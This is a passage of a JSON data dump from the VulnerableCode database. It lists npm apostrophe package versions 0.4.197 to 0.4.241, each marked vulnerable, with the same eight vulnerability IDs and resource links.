efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.197"},{"url":"http://public2.vulnerablecode.io/api/packages/268046?format=json","purl":"pkg:npm/apostrophe@0.4.198","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.198"},{"url":"http://public2.vulnerablecode.io/api/packages/268047?format=json","purl":"pkg:npm/apostrophe@0.4.199","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.199"},{"url":"http://public2.vulnerablecode.io/api/packages/268048?format=json","purl":"pkg:npm/apostrophe@0.4.200","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.200"},{"url":"http://public2.vulnerablecode.io/api/packages/268049?format=json","purl":"pkg:npm/apostrophe@0.4.201","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.201"},{"url":"http://public2.vulnerablecode.io/api/packages/268050?format=json","purl":"pkg:npm/apostrophe@0.4.202","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.202"},{"url":"http://public2.vulnerablecode.io/api/packages/268051?format=json","purl":"pkg:npm/apostrophe@0.4.203","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.203"},{"url":"http://public2.vulnerablecode.io/api/packages/268052?format=json","purl":"pkg:npm/apostrophe@0.4.204","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.204"},{"url":"http://public2.vulnerablecode.io/api/packages/268053?format=json","purl":"pkg:npm/apostrophe@0.4.205","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.205"},{"url":"http://public2.vulnerablecode.io/api/packages/268054?format=json","purl":"pkg:npm/apostrophe@0.4.206","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.206"},{"url":"http://public2.vulnerablecode.io/api/packages/268055?format=json","purl":"pkg:npm/apostrophe@0.4.207","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.207"},{"url":"http://public2.vulnerablecode.io/api/packages/268056?format=json","purl":"pkg:npm/apostrophe@0.4.208","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.208"},{"url":"http://public2.vulnerablecode.io/api/packages/268057?format=json","purl":"pkg:npm/apostrophe@0.4.209","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.209"},{"url":"http://public2.vulnerablecode.io/api/packages/268058?format=json","purl":"pkg:npm/apostrophe@0.4.210","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.210"},{"url":"http://public2.vulnerablecode.io/api/packages/268059?format=json","purl":"pkg:npm/apostrophe@0.4.211","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.211"},{"url":"http://public2.vulnerablecode.io/api/packages/268060?format=json","purl":"pkg:npm/apostrophe@0.4.212","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.212"},{"url":"http://public2.vulnerablecode.io/api/packages/268061?format=json","purl":"pkg:npm/apostrophe@0.4.213","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.213"},{"url":"http://public2.vulnerablecode.io/api/packages/268062?format=json","purl":"pkg:npm/apostrophe@0.4.214","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.214"},{"url":"http://public2.vulnerablecode.io/api/packages/268063?format=json","purl":"pkg:npm/apostrophe@0.4.215","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.215"},{"url":"http://public2.vulnerablecode.io/api/packages/268064?format=json","purl":"pkg:npm/apostrophe@0.4.216","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.216"},{"url":"http://public2.vulnerablecode.io/api/packages/268065?format=json","purl":"pkg:npm/apostrophe@0.4.217","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.217"},{"url":"http://public2.vulnerablecode.io/api/packages/268066?format=json","purl":"pkg:npm/apostrophe@0.4.218","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.218"},{"url":"http://public2.vulnerablecode.io/api/packages/268067?format=json","purl":"pkg:npm/apostrophe@0.4.219","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.219"},{"url":"http://public2.vulnerablecode.io/api/packages/268068?format=json","purl":"pkg:npm/apostrophe@0.4.220","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.220"},{"url":"http://public2.vulnerablecode.io/api/packages/268069?format=json","purl":"pkg:npm/apostrophe@0.4.221","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.221"},{"url":"http://public2.vulnerablecode.io/api/packages/268070?format=json","purl":"pkg:npm/apostrophe@0.4.222","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.222"},{"url":"http://public2.vulnerablecode.io/api/packages/268071?format=json","purl":"pkg:npm/apostrophe@0.4.223","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.223"},{"url":"http://public2.vulnerablecode.io/api/packages/268072?format=json","purl":"pkg:npm/apostrophe@0.4.224","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.224"},{"url":"http://public2.vulnerablecode.io/api/packages/268073?format=json","purl":"pkg:npm/apostrophe@0.4.225","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.225"},{"url":"http://public2.vulnerablecode.io/api/packages/268074?format=json","purl":"pkg:npm/apostrophe@0.4.227","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.227"},{"url":"http://public2.vulnerablecode.io/api/packages/268075?format=json","purl":"pkg:npm/apostrophe@0.4.228","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.228"},{"url":"http://public2.vulnerablecode.io/api/packages/268076?format=json","purl":"pkg:npm/apostrophe@0.4.229","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.229"},{"url":"http://public2.vulnerablecode.io/api/packages/268077?format=json","purl":"pkg:npm/apostrophe@0.4.230","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.230"},{"url":"http://public2.vulnerablecode.io/api/packages/268078?format=json","purl":"pkg:npm/apostrophe@0.4.231","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.231"},{"url":"http://public2.vulnerablecode.io/api/packages/268079?format=json","purl":"pkg:npm/apostrophe@0.4.232","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.232"},{"url":"http://public2.vulnerablecode.io/api/packages/268080?format=json","purl":"pkg:npm/apostrophe@0.4.233","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.233"},{"url":"http://public2.vulnerablecode.io/api/packages/268081?format=json","purl":"pkg:npm/apostrophe@0.4.234","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.234"},{"url":"http://public2.vulnerablecode.io/api/packages/268082?format=json","purl":"pkg:npm/apostrophe@0.4.235","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.235"},{"url":"http://public2.vulnerablecode.io/api/packages/268083?format=json","purl":"pkg:npm/apostrophe@0.4.236","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.236"},{"url":"http://public2.vulnerablecode.io/api/packages/268084?format=json","purl":"pkg:npm/apostrophe@0.4.237","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.237"},{"url":"http://public2.vulnerablecode.io/api/packages/268085?format=json","purl":"pkg:npm/apostrophe@0.4.238","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.238"},{"url":"http://public2.vulnerablecode.io/api/packages/268086?format=json","purl":"pkg:npm/apostrophe@0.4.239","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.239"},{"url":"http://public2.vulnerablecode.io/api/packages/268087?format=json","purl":"pkg:npm/apostrophe@0.4.240","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.240"},{"url":"http://public2.vulnerablecode.io/api/packages/268088?format=json","purl":"pkg:npm/apostrophe@0.4.241","is_vulnerable":true,"affected_by_vulnerabilities":[{"vulnerability":"VCID-4twt-e5vw-m3em"},{"vulnerability":"VCID-5tyh-bvgy-nuhe"},{"vulnerability":"VCID-5v79-remg-7ub4"},{"vulnerability":"VCID-a7rh-r1sn-2udh"},{"vulnerability":"VCID-ewtn-suju-dyeb"},{"vulnerability":"VCID-h7q4-v6us-9ye4"},{"vulnerability":"VCID-pvxq-3qsf-efc5"},{"vulnerability":"VCID-tm23-2xhx-87hc"}],"resource_url":"http://public2.vulnerablecode.io/packages/pkg:npm/apostrophe@0.4.241"},{"url":"http://public2.vulnerablecode.io/api/packages/268089?format=json","purl":"pkg:npm/a